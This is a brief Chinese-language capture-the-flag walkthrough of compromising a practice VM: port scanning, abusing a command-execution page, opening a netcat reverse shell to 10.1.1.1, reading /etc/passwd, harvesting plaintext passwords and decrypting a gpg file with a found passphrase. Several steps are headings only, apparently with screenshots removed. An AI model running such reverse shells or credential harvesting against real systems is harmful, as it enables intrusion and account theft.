Nmap端口扫描:
发现robots.txt
Login.php不存在,其他的页面也没有什么用
发现一个可以执行命令的页面:Ls命令估计被过滤了:
又学一个:lsattr查看文件属性
发现有一个备份文件:存在两处过滤,无法使用nc反弹shell,使用下面的命令反弹成功。(bash反弹失败)
反弹shell:/bin/nc -e /bin/sh 10.1.1.1 1234
美化shell:Python -c “Import pty;pty.spawn(‘/bin/bash’);”
查看id,groups:
看一下sudo配置:
翻一下目录啥的:
里面应该是有多个用户:再查看一下/etc/passwd
进入elliot文件夹:查看到theadminisdumb.txt
查看一下文件,里面暴露了elliot和jc的密码。
之后再翻bob的目录:
有一个login.txt.gpg,是加密文件,之后又翻Secret文件夹,最后会发现一个sh文件,运行。
居然是一个藏头诗,成功获取解密密码:HARPOCRATES。这里要补充一下gpg的解密相关知识:
查看版本:
自动解密命令:gpg –batch –passphrase HARPOCRATES -d login.txt.gpg
解密成功:
看其他的blog都要下载文件,但是直接解密成功了,估计是我登陆了其他用户的关系。
Nc实现文件发送:
目标机输入命令:
攻击机输入:
结果:
登录bob,获取flag:是sudo组
修改一下密码先:
获取flag: